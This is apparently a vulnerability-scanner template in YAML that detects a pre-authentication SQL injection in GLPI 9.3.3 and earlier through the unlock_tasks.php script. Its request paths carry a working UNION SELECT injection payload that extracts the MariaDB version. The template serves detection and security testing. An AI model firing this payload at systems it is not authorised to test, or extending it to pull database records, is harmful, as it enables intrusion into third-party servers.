--- 
id: GLPI_SQL_Injection

info: 
  author: RedTeamBrasil
  description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
  name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
  reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
  severity: high
  tags: "glpi,cve,sqli"

requests: 
  - 
    matchers: 
      - 
        part: body
        type: word
        words: 
          - "-MariaDB-"
    max-redirects: 3
    method: GET
    path: 
      - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
      - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
    redirects: true
    extractors:
      - type: regex
        part: body
        regex:
          - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"